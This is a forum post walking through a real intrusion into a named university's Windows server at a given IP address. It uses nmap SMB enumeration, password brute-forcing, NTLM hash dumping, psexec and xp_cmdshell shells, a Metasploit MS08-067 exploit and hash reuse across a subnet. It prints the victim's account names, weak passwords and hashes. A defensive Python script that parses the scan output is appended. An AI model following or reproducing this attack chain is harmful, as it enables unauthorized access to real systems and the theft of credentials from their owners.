nmap + msf intrusion of Guangxi Normal University

Posted on 2012-12-4 12:46:42
Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST

Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :

MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// this uses the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST

Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser    // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// view the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST

Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST

Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST

Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // obtain a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "    // log in remotely as sa and execute a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST

Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole    // use msf to exploit the ms08-067 vulnerability against the target machine

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit

meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the usernames and the obtained hash to attempt logins across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf + nmap attack~~
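As an added example (not part of the original post), a small Python audit script that parses nmap's "Host script results:" blocks in the format shown above and turns the three conditions this walkthrough relies on (anonymous share access from smb-enum-shares, successful smb-brute logins, and an smb-check-vulns VULNERABLE line) into defender findings. The SAMPLE input is constructed to mirror the post's output; the function names are mine.

```python
import re
# Constructed sample, modelled on the nmap "Host script results:" blocks in the post
SAMPLE = """\
Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-check-vulns:
|_  MS08-067: VULNERABLE
"""

def parse_host_scripts(text):
    """Group the '|'-prefixed NSE output lines by script name."""
    scripts, current = {}, None
    for raw in text.splitlines():
        if not raw.startswith("|"):
            continue                      # port table, banners etc. are not script output
        body = raw.lstrip("|_")
        m = re.match(r"^ (\S+):$", body)  # '| smb-brute:' opens a new script block
        if m:
            current = m.group(1)
            scripts[current] = []
        elif current is not None:
            scripts[current].append(body.strip())
    return scripts

def audit(scripts):
    """Map parsed script output to (severity, message) findings a defender would act on."""
    findings, share = [], None
    for line in scripts.get("smb-enum-shares", []):
        if line.startswith("Anonymous access:"):
            level = line.split(":", 1)[1].strip()
            if level != "<none>":         # null-session access to a share
                findings.append(("HIGH", f"share {share} allows anonymous {level}"))
        else:
            share = line                  # a bare line names the next share
    for line in scripts.get("smb-brute", []):
        m = re.match(r"(\S+):(\S+) => Login was successful", line)
        if m:
            user, pw = m.groups()
            how = "blank password" if pw == "<blank>" else "guessable password"
            findings.append(("CRITICAL", f"account {user} has a {how}"))
    for line in scripts.get("smb-check-vulns", []):
        m = re.match(r"(MS\d{2}-\d{3}): VULNERABLE", line)
        if m:
            findings.append(("CRITICAL", f"unpatched {m.group(1)} reachable over SMB"))
    return findings
```

Feed a full nmap report to `audit(parse_host_scripts(output))`; lines outside the script blocks are ignored, so the port table does not need to be stripped first.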
" b* l1 D9 M' w4 s! m0 \! {# e0 b
, h% K9 b2 B- \8 B
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表